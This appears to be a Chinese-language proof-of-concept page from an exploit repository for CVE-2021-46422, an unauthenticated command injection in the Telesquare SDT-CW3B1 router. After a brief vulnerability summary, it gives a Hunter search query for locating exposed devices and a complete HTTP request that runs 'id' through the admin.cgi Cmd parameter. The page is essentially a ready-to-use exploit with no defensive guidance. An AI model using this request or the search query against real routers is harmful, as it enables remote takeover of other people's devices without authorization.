POC/wpoc/Telesquare/TelesquareSDT-CW3B1无线路由器admin.cgi远程命令执行漏洞(CVE-2021-46422).md

32 lines
1.3 KiB
Markdown
Raw Normal View History

2025-03-04 23:12:57 +08:00
# Telesquare SDT-CW3B1无线路由器admin.cgi 远程命令执行漏洞(CVE-2021-46422)
# 一、漏洞简介
Telesquare SDT-CW3B1是韩国Telesquare公司的无线路由器产品。Telesquare SDT-CW3B1 1.1.0 版本存在操作系统命令注入漏洞。远程攻击者可利用该漏洞在无需任何身份验证的情况下执行操作系统命令。
# 二、影响版本
+ Telesquare SDT-CW3B1 1.1.0
# 三、资产测绘
+ hunter`app.name=="Telesquare Router"`
+ 特征
![1700233053166-8eb3438f-a051-4482-9c4d-133f3bf80241.png](./img/hUm6GNLeu2yN1SN-/1700233053166-8eb3438f-a051-4482-9c4d-133f3bf80241-391808.png)
# 四、漏洞复现
```plain
GET /cgi-bin/admin.cgi?Command=sysCommand&Cmd=id HTTP/1.1
Host: xx.xx.xx.xx
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/119.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1
```
![1700235255810-240921a9-b67b-4b8f-bfbc-20a922f14f97.png](./img/hUm6GNLeu2yN1SN-/1700235255810-240921a9-b67b-4b8f-bfbc-20a922f14f97-240162.png)
> 更新: 2024-02-29 23:57:13
> 原文: <https://www.yuque.com/xiaokp7/ocvun2/qig0nr6ohmhnx304>